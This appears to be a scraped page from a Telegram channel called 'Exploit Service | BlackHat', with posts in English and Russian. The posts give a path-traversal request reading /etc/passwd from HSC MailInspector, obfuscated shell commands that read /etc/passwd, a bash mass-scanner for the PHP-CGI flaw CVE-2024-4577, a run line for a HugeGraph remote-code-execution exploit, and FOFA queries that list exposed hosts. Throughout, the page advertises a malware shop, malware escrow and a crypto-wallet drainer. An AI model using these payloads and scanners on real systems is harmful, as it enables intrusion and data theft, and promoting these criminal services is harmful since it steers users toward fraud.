Exploit Service
Exploit Service | BlackHat ZERO DAY'S EXPLOITS Everything is published for informational purposes only. Private: @ExploitServiceBot Exploit Developers: @ExploitDevs All Projects: @MalwareLinks Escrow: @MalwareEscrow
Mostrar más- Suscriptores
- Cobertura postal
- ER - ratio de compromiso
Carga de datos en curso...
Carga de datos en curso...
GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd
FOFA:
title=="..:: HSC MailInspector ::.."
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupportcat ${HOME:0:1}etc${HOME:0:1}passwd
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupportThe only one contact to start work: @stop
#!/bin/bash
# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
-H "User-Agent: curl/8.3.0" \
-H "Accept: */*" \
-H "Content-Length: 23" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "<?php phpinfo(); ?>" \
--max-time 10)
if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
fi
}
# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
check_vulnerability "$domain"
done < "$file"
}
# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <domain_list_file>"
exit 1
fi
# Call the main function with the domain list file
main "$1"
*
Сохраняйте скрипт и по списку доменов:
./CVE-2024-4577_script.sh /path/to/domains-list
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupportPHP-CGI
работает на платформе Windows
и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823
. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации.
https://en.fofa.info/result?qbase64=YXBwPSJYQU1QUCI%3D (610,604 хостов)
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupportpython3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"
https://github.com/kljunowsky/CVE-2024-27348
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx
Support: @angelsupportApache HugeGraph Server Unauthenticated RCE - CVE-2024-27348 Proof of concept Exploit - GitHub - kljunowsky/CVE-2024-27348: Apache HugeGraph Server Unauthenticated RCE - CVE-2024-27348 Proof of c...
Another fun exploit! This time with local privilege escalation through Apple’s PackageKit.framework when running ZSH-based PKGs 🎉.
Tu plan actual sólo permite el análisis de 5 canales. Para obtener más, elige otro plan.